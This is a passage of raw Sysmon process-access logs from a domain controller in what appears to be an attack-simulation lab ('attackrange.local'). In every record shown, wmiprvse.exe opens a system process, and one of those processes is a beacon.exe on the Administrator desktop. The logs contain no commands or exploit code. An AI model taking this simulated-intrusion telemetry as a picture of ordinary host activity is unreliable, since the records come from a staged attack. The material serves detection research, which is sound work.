Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B0A01FF66A6D9094C0362B6832BED9A,SHA256=CC20A9E06F9B5C43655C1207AB52CDF4E8EFE28E7931B27F94020D16411501DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238376Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238375Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238374Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238373Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238372Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238371Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238370Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238369Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238368Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238367Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238366Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238365Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238364Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238363Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238362Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238361Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238360Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238359Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238358Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.185{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238357Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\R